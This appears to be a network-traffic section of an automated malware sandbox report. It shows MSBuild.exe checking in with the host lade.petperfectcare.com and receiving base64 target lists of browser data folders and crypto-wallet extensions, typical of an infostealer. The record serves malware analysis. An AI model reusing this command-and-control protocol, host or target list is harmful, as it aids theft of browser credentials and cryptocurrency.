Oct 7, 2024 18:47:20.416230917 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.418869019 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.421710014 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.421744108 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.471612930 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.497056961 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.538330078 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.549578905 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.549712896 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.553025961 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.560774088 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.560786963 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.600908995 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.600914001 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.636982918 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.678997993 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.679004908 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.725894928 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.732261896 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.772716999 CEST	49769	443	192.168.2.4	13.107.246.45

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 18:46:32.413419008 CEST	62904	53	192.168.2.4	1.1.1.1
Oct 7, 2024 18:46:32.428730965 CEST	53	62904	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 18:46:32.413419008 CEST	192.168.2.4	1.1.1.1	0x29e0	Standard query (0)	lade.petperfectcare.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 18:46:11.535830975 CEST	1.1.1.1	192.168.2.4	0xfd6a	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:46:11.535830975 CEST	1.1.1.1	192.168.2.4	0xfd6a	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:46:12.080286026 CEST	1.1.1.1	192.168.2.4	0x535a	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 18:46:12.080286026 CEST	1.1.1.1	192.168.2.4	0x535a	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:46:32.428730965 CEST	1.1.1.1	192.168.2.4	0x29e0	No error (0)	lade.petperfectcare.com		95.164.90.97	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:07.238154888 CEST	1.1.1.1	192.168.2.4	0x5b6a	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 18:47:07.238154888 CEST	1.1.1.1	192.168.2.4	0x5b6a	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:13.710243940 CEST	1.1.1.1	192.168.2.4	0xe161	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 7, 2024 18:47:13.710243940 CEST	1.1.1.1	192.168.2.4	0xe161	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

lade.petperfectcare.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	95.164.90.97	80	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 18:46:32.463808060 CEST	98	OUT	GET / HTTP/1.1 Host: lade.petperfectcare.com Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 18:46:33.638705015 CEST	168	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 16:46:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2024 18:46:33.642240047 CEST	446	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDBFCBKFIDHIDHDHIE Host: lade.petperfectcare.com Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 37 43 44 36 35 44 46 37 41 45 31 33 30 31 39 37 39 34 31 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="hwid"857CD65DF7AE1301979414-a33c7340-61ca------ECGDBFCBKFIDHIDHDHIEContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------ECGDBFCBKFIDHIDHDHIE--
Oct 7, 2024 18:46:34.275516033 CEST	232	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 16:46:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|7c6bbfba4ec648f9a73d86a3a5f9c771\|1\|1\|1\|0\|0\|50000\|10
Oct 7, 2024 18:46:34.276621103 CEST	521	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIIIDAFBFBKECBGDBGI Host: lade.petperfectcare.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 49 44 41 46 42 46 42 4b 45 43 42 47 44 42 47 49 2d 2d 0d 0a Data Ascii: ------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------BFIIIDAFBFBKECBGDBGIContent-Disposition: form-data; name="mode"1------BFIIIDAFBFBKECBGDBGI--
Oct 7, 2024 18:46:34.937433958 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 16:46:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 5a 70 64 6d 46 73 5a 47 6c 38 58 46 5a 70 64 6d 46 73 5a 47 6c 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 44 62 32 31 76 5a 47 38 67 52 48 4a 68 5a 32 39 75 66 46 78 44 62 [TRUNCATED] Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfFZpdmFsZGl8XFZpdmFsZGlcVXNlciBEYXRhfGNocm9tZXxDb21vZG8gRHJhZ29ufFxDb21vZG9cRHJhZ29uXFVzZXIgRGF0YXxjaHJvbWV8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxCcmF2ZXxcQnJhdmVTb2Z0d2FyZVxCcmF2ZS1Ccm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZXxcTWljcm9zb2Z0XEVkZ2VcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBDYW5hcnl8XE1pY3Jvc29mdFxFZGdlIFN4U1xVc2VyIERhdGF8Y2hyb21lfE1pY3Jvc29mdCBFZGdlIEJldGF8XE1pY3Jvc29mdFxFZGdlIEJldGFcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBEZXZ8XE1pY3Jvc29mdFxFZGdlIERldlxVc2V [TRUNCATED]
Oct 7, 2024 18:46:34.937990904 CEST	491	IN	Data Raw: 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 52 55 55 4a 79 62 33 64 7a 5a 58 4a 38 58 46 52 6c 62 6d 4e 6c 62 6e 52 63 55 56 46 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 Data Ascii: VXNlciBEYXRhfGNocm9tZXxRUUJyb3dzZXJ8XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q3J5cHRvVGFiIEJyb3dzZXJ8XENyeXB0b1RhYiBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8T3BlcmF8XE9wZXJhIFNvZnR3YXJlfG9wZXJhfE9wZXJhIEdYfFxPcGVyYSBTb2Z0d2FyZXxvcGVyYXxPcGVyYSB
Oct 7, 2024 18:46:34.939420938 CEST	521	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFH Host: lade.petperfectcare.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="mode"2------KFHJJDHJEGHJKECBGCFH--
Oct 7, 2024 18:46:35.929681063 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 16:46:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 32 6c 6f 62 32 5a 6c 59 33 77 78 66 44 42 38 4d 48 78 43 61 57 35 68 62 6d 4e 6c 51 32 68 68 61 57 35 58 59 57 78 73 5a 58 52 38 4d 58 78 6d 61 47 4a 76 61 47 6c 74 59 57 56 73 59 6d 39 6f 63 47 70 69 59 6d 78 6b 59 32 35 6e 59 32 35 68 63 47 35 6b [TRUNCATED] Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3wxfDB8MHxCaW5hbmNlQ2hhaW5XYWxsZXR8MXxmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHwxfDF8MHxZb3JvaXwxfGZmbmJlbGZkb2Vpb2hlbmtqaWJubWFkamllaGpoYWpifDF8MHwwfENvaW5iYXNlfDF8aG5mYW5rbm9jZmVvZmJkZGdjaWpubWhuZm5rZG5hYWR8MXwwfDF8R3VhcmRhfDF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDF8aVdhbGxldHwxfGtuY2NoZGlnb2JnaGVuYmJhZGRvampubmFvZ2ZwcGZqfDF8MHwwfFJvbmluV2FsbGV0fDF8Zm5qaG1raGhta2Jqa2thYm5kY25ub2dhZ29nYm5lZWN8MXwwfDB8TmVvTGluZXwxfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENsb3ZlcldhbGxldHwxfG5obmtia2dqaWtnY2lnYWRvbWtwaGFsYW5uZGNhcGprfDF8MHwwfExpcXVhbGl0eVdhbGxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2tub2drZ2NkZmhoYmRkY2doYW [TRUNCATED]
Oct 7, 2024 18:46:35.929750919 CEST	224	IN	Data Raw: 6b 63 47 52 74 61 32 46 68 61 32 56 71 62 6d 68 68 5a 58 77 78 66 44 42 38 4d 48 78 51 62 32 78 35 62 57 56 7a 61 46 64 68 62 47 78 6c 64 48 77 78 66 47 70 76 61 6d 68 6d 5a 57 39 6c 5a 47 74 77 61 32 64 73 59 6d 5a 70 62 57 52 6d 59 57 4a 77 5a Data Ascii: kcGRta2Fha2VqbmhhZXwxfDB8MHxQb2x5bWVzaFdhbGxldHwxfGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHwxfGZscGljaWlsZW1naGJtZmFsaWNham9vbGhra2VuZmVsfDF8MHwwfENvaW45OHwxfGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF
Oct 7, 2024 18:46:35.929760933 CEST	1236	IN	Data Raw: 38 4d 48 77 77 66 45 56 57 52 56 49 67 56 32 46 73 62 47 56 30 66 44 46 38 59 32 64 6c 5a 57 39 6b 63 47 5a 68 5a 32 70 6a 5a 57 56 6d 61 57 56 6d 62 47 31 6b 5a 6e 42 6f 63 47 78 72 5a 57 35 73 5a 6d 74 38 4d 58 77 77 66 44 42 38 53 32 46 79 5a Data Ascii: 8MHwwfEVWRVIgV2FsbGV0fDF8Y2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8MXwwfDB8S2FyZGlhQ2hhaW58MXxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXwxfGFjbWFjb2RramJkZ21vbGVlYm9sbWRqb25pbGtkYmNofDF8MHwwfFBoYW50b218MXxiZm5hZWxtb21laW1obH
Oct 7, 2024 18:46:35.929909945 CEST	1236	IN	Data Raw: 6c 63 48 42 6e 5a 48 42 6f 66 44 46 38 4d 48 77 77 66 45 56 34 62 32 52 31 63 79 42 58 5a 57 49 7a 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 46 6f 62 32 78 77 5a 6d 52 70 59 57 78 71 5a 32 70 6d 61 47 39 74 61 57 68 72 61 6d 4a 74 5a 32 70 70 5a Data Ascii: lcHBnZHBofDF8MHwwfEV4b2R1cyBXZWIzIFdhbGxldHwxfGFob2xwZmRpYWxqZ2pmaG9taWhramJtZ2ppZGxjZG5vfDF8MHwwfEJyYWF2b3N8MXxqbmxnYW1lY2JwbWJhampmaG1tbWxoZWprZW1lamRtYXwxfDB8MHxFbmtyeXB0fDF8a2twbGxrb2RqZWxvaWRpZWVkb2pvZ2FjZmhwYWlob2h8MXwwfDB8T0tYIFdlYjMgV2
Oct 7, 2024 18:46:35.929923058 CEST	1236	IN	Data Raw: 76 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 4a 6e 61 6d 39 6e 63 47 39 70 5a 47 56 71 5a 47 56 74 5a 32 39 76 59 32 68 77 62 6d 74 74 5a 47 70 77 62 32 4e 6e 61 32 68 68 66 44 46 38 4d 48 77 77 66 45 4e 76 61 57 35 6f 64 57 4a 38 4d 58 78 71 5a Data Ascii: vIFdhbGxldHwxfGJnam9ncG9pZGVqZGVtZ29vY2hwbmttZGpwb2Nna2hhfDF8MHwwfENvaW5odWJ8MXxqZ2FhaW1hamlwYnBkb2dwZGdsaGFwaGxkYWtpa2dlZnwxfDB8MHxMZWFwIENvc21vcyBXYWxsZXR8MXxmY2ZjZmxsZm5kbG9tZGhiZWhqamNvaW1iZ29mZG5jZ3wxfDB8MHxNdWx0aXZlcnNYIERlRmkgV2FsbGV0fD
Oct 7, 2024 18:46:35.929944992 CEST	680	IN	Data Raw: 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 31 72 63 47 56 6e 61 6d 74 69 62 47 74 72 5a 57 5a 68 59 32 5a 75 62 57 74 68 61 6d 4e 71 62 57 46 69 61 57 70 6f 59 32 78 6e 66 44 46 38 4d 48 77 77 66 45 4a 68 59 32 74 77 59 Data Ascii: pYyBFZGVuIFdhbGxldHwxfG1rcGVnamtibGtrZWZhY2ZubWthamNqbWFiaWpoY2xnfDF8MHwwfEJhY2twYWNrIFdhbGxldHwxfGFmbGttZmhlYmVkYmppb2lwZ2xnY2JjbW5icGdsaW9mfDF8MHwwfFRvbmtlZXBlciBXYWxsZXR8MXxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYW
Oct 7, 2024 18:46:35.930186033 CEST	680	IN	Data Raw: 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 31 72 63 47 56 6e 61 6d 74 69 62 47 74 72 5a 57 5a 68 59 32 5a 75 62 57 74 68 61 6d 4e 71 62 57 46 69 61 57 70 6f 59 32 78 6e 66 44 46 38 4d 48 77 77 66 45 4a 68 59 32 74 77 59 Data Ascii: pYyBFZGVuIFdhbGxldHwxfG1rcGVnamtibGtrZWZhY2ZubWthamNqbWFiaWpoY2xnfDF8MHwwfEJhY2twYWNrIFdhbGxldHwxfGFmbGttZmhlYmVkYmppb2lwZ2xnY2JjbW5icGdsaW9mfDF8MHwwfFRvbmtlZXBlciBXYWxsZXR8MXxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYW
Oct 7, 2024 18:46:35.930454969 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 16:46:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 32 6c 6f 62 32 5a 6c 59 33 77 78 66 44 42 38 4d 48 78 43 61 57 35 68 62 6d 4e 6c 51 32 68 68 61 57 35 58 59 57 78 73 5a 58 52 38 4d 58 78 6d 61 47 4a 76 61 47 6c 74 59 57 56 73 59 6d 39 6f 63 47 70 69 59 6d 78 6b 59 32 35 6e 59 32 35 68 63 47 35 6b [TRUNCATED] Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3wxfDB8MHxCaW5hbmNlQ2hhaW5XYWxsZXR8MXxmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHwxfDF8MHxZb3JvaXwxfGZmbmJlbGZkb2Vpb2hlbmtqaWJubWFkamllaGpoYWpifDF8MHwwfENvaW5iYXNlfDF8aG5mYW5rbm9jZmVvZmJkZGdjaWpubWhuZm5rZG5hYWR8MXwwfDF8R3VhcmRhfDF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDF8aVdhbGxldHwxfGtuY2NoZGlnb2JnaGVuYmJhZGRvampubmFvZ2ZwcGZqfDF8MHwwfFJvbmluV2FsbGV0fDF8Zm5qaG1raGhta2Jqa2thYm5kY25ub2dhZ29nYm5lZWN8MXwwfDB8TmVvTGluZXwxfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENsb3ZlcldhbGxldHwxfG5obmtia2dqaWtnY2lnYWRvbWtwaGFsYW5uZGNhcGprfDF8MHwwfExpcXVhbGl0eVdhbGxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2tub2drZ2NkZmhoYmRkY2doYW [TRUNCATED]
